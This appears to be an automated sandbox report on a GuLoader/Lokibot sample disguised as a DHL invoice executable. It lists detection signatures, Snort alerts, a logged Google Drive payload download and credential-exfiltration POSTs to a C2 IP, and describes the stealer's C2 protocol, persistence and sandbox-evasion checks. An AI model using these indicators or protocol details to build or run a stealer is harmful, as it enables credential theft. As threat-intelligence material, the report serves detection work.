Edit tour

Windows Analysis Report
DHL_#U53d1#U7968.exe

Overview

General Information

Sample Name:	DHL_#U53d1#U7968.exe
Analysis ID:	1289543
MD5:	3a4573d8d04df837bd32d2ef156e44aa
SHA1:	7c8d941ba5c89c9d7d4d36f3a41f3a2d3b0db847
SHA256:	a0ed9aa9fd74c33893155220c4467b83592ac8e7244475d5cbf7b37a7075af36
Infos:

Detection

GuLoader, Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Yara detected Lokibot

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Yara detected GuLoader

Snort IDS alert for network traffic

Tries to steal Mail credentials (via file / registry access)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Internet Provider seen in connection with other malware

Detected potential crypto function

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

IP address seen in connection with other malware

Enables debug privileges

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Found evaded block containing many API calls

PE / OLE file has an invalid certificate

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

DHL_#U53d1#U7968.exe (PID: 4900 cmdline: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe MD5: 3A4573D8D04DF837BD32D2EF156E44AA)

DHL_#U53d1#U7968.exe (PID: 8008 cmdline: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe MD5: 3A4573D8D04DF837BD32D2EF156E44AA)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/ https://blog.morphisec.com/guloader-the-rat-downloader	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.11507900832.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000000.00000002.11460420814.0000000004805000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: DHL_#U53d1#U7968.exe PID: 8008	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Snort Signatures

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.11.20 - Destination IP: 216.128.145.196

Timestamp:	192.168.11.20216.128.145.19649835802024313 08/10/23-19:13:04.980323
SID:	2024313
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.11.20 - Destination IP: 216.128.145.196

Timestamp:	192.168.11.20216.128.145.19649835802024318 08/10/23-19:13:04.980323
SID:	2024318
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.11.20 - Destination IP: 216.128.145.196

Timestamp:	192.168.11.20216.128.145.19649832802024317 08/10/23-19:13:02.382054
SID:	2024317
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.11.20 - Destination IP: 216.128.145.196

Timestamp:	192.168.11.20216.128.145.19649833802024312 08/10/23-19:13:03.684720
SID:	2024312
Source Port:	49833
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.11.20 - Destination IP: 216.128.145.196

Timestamp:	192.168.11.20216.128.145.19649833802021641 08/10/23-19:13:03.684720
SID:	2021641
Source Port:	49833
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.11.20 - Destination IP: 216.128.145.196

Timestamp:	192.168.11.20216.128.145.19649835802021641 08/10/23-19:13:04.980323
SID:	2021641
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.11.20 - Destination IP: 216.128.145.196

Timestamp:	192.168.11.20216.128.145.19649833802024317 08/10/23-19:13:03.684720
SID:	2024317
Source Port:	49833
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.11.20 - Destination IP: 216.128.145.196

Timestamp:	192.168.11.20216.128.145.19649832802021641 08/10/23-19:13:02.382054
SID:	2021641
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.11.20 - Destination IP: 216.128.145.196

Timestamp:	192.168.11.20216.128.145.19649832802024312 08/10/23-19:13:02.382054
SID:	2024312
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /~wellseconds/?p=43026970 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 216.128.145.196Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E82E0162Content-Length: 178Connection: close

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RkYk72jHuXza_mEHkFaPldPXcTgoFYZE HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ca95q9srt742e8g9mee28t9fvcpi0rnq/1691687550000/04164905018868905653/*/1RkYk72jHuXza_mEHkFaPldPXcTgoFYZE?e=download&uuid=fd09c5b4-1c26-472b-8acd-937df6ec0e47 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Cache-Control: no-cacheHost: doc-0s-3o-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 142.250.181.238:443 -> 192.168.11.20:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.129:443 -> 192.168.11.20:49831 version: TLS 1.2

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Code function: 0_2_00404B30 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404B30

Source: DHL_#U53d1#U7968.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Code function: 0_2_004036FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,

0_2_004036FC

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Code function: 0_2_0040441E	0_2_0040441E
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Code function: 0_2_004075FE	0_2_004075FE
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Code function: 0_2_00406EA8	0_2_00406EA8
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Code function: 0_2_6EF22351	0_2_6EF22351

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Section loaded: edgegdi.dll			Jump to behavior

Source: DHL_#U53d1#U7968.exe

Static PE information: invalid certificate

Source: DHL_#U53d1#U7968.exe

ReversingLabs: Detection: 23%

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

File read: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Jump to behavior

Source: DHL_#U53d1#U7968.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe C:\Users\user\Desktop\DHL_#U53d1#U7968.exe
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process created: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe C:\Users\user\Desktop\DHL_#U53d1#U7968.exe
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process created: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Jump to behavior

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

0_2_004036FC

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6eb

Jump to behavior

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

File created: C:\Users\user\AppData\Local\Temp\nsr69A9.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/9@2/3

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Code function: 0_2_0040234F LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,

0_2_0040234F

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Code function: 0_2_00404085 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,EnableWindow,

0_2_00404085

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Mutant created: \Sessions\1\BaseNamedObjects\28278665D4ACB73EF64D459A

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: DHL_#U53d1#U7968.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: DHL_#U53d1#U7968.exe, 00000002.00000001.11353177109.0000000000649000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: mshtml.pdbUGP source: DHL_#U53d1#U7968.exe, 00000002.00000001.11353177109.0000000000649000.00000020.00000001.01000000.00000005.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.11460420814.0000000004805000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Code function: 0_2_6EF22351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6EF22351

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	File created: C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.exe			Jump to dropped file
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	File created: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (31).png

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: DHL_#U53d1#U7968.exe, 00000000.00000002.11458676779.0000000000758000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXESGAI3
Source: DHL_#U53d1#U7968.exe, 00000000.00000002.11458676779.0000000000758000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEP6TD^3F
Source: DHL_#U53d1#U7968.exe, 00000000.00000002.11459865198.0000000002A30000.00000004.00001000.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000002.11509137540.0000000002B20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe TID: 4376	Thread sleep count: 141 > 30			Jump to behavior
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe TID: 5096	Thread sleep time: -60000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Evaded block: after key decision

graph_0-4706

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Code function: 0_2_00406719 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00406719
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Code function: 0_2_004065CF FindFirstFileW,FindClose,	0_2_004065CF
Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe	Code function: 0_2_00402B75 FindFirstFileW,	0_2_00402B75

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

API call chain: ExitProcess graph end node

graph_0-4591

Source: DHL_#U53d1#U7968.exe, 00000000.00000002.11479330879.0000000005789000.00000004.00000800.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000002.11509573810.0000000004409000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: DHL_#U53d1#U7968.exe, 00000000.00000002.11458676779.0000000000758000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exep6TD^3f
Source: DHL_#U53d1#U7968.exe, 00000000.00000002.11479330879.0000000005789000.00000004.00000800.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000002.11509573810.0000000004409000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: DHL_#U53d1#U7968.exe, 00000002.00000002.11509573810.0000000004409000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: DHL_#U53d1#U7968.exe, 00000000.00000002.11479330879.0000000005789000.00000004.00000800.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000002.11509573810.0000000004409000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: DHL_#U53d1#U7968.exe, 00000000.00000002.11479330879.0000000005789000.00000004.00000800.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000002.11509573810.0000000004409000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: DHL_#U53d1#U7968.exe, 00000000.00000002.11479330879.0000000005789000.00000004.00000800.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000002.11509573810.0000000004409000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: DHL_#U53d1#U7968.exe, 00000002.00000002.11509573810.0000000004409000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: DHL_#U53d1#U7968.exe, 00000002.00000003.11469874763.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.00000000029A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.0000000002976000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh8
Source: DHL_#U53d1#U7968.exe, 00000000.00000002.11458676779.0000000000758000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exesgAi3
Source: DHL_#U53d1#U7968.exe, 00000000.00000002.11459865198.0000000002A30000.00000004.00001000.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000002.11509137540.0000000002B20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: DHL_#U53d1#U7968.exe, 00000000.00000002.11479330879.0000000005789000.00000004.00000800.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000002.11509573810.0000000004409000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: DHL_#U53d1#U7968.exe, 00000000.00000002.11479330879.0000000005789000.00000004.00000800.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000002.11509573810.0000000004409000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: DHL_#U53d1#U7968.exe, 00000002.00000003.11469874763.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.00000000029A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: DHL_#U53d1#U7968.exe, 00000000.00000002.11479330879.0000000005789000.00000004.00000800.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000002.11509573810.0000000004409000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: DHL_#U53d1#U7968.exe, 00000002.00000002.11509573810.0000000004409000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

0_2_6EF22351

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Code function: 0_2_0040154A PostQuitMessage,LdrInitializeThunk,Sleep,SetForegroundWindow,LdrInitializeThunk,ShowWindow,ShowWindow,ShowWindow,SetFileAttributesW,GetFileAttributesW,SetCurrentDirectoryW,MoveFileW,GetFullPathNameW,GetShortPathNameW,SearchPathW,lstrcatW,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatW,

0_2_0040154A

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Process created: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Jump to behavior

Source: C:\Users\user\Desktop\DHL_#U53d1#U7968.exe
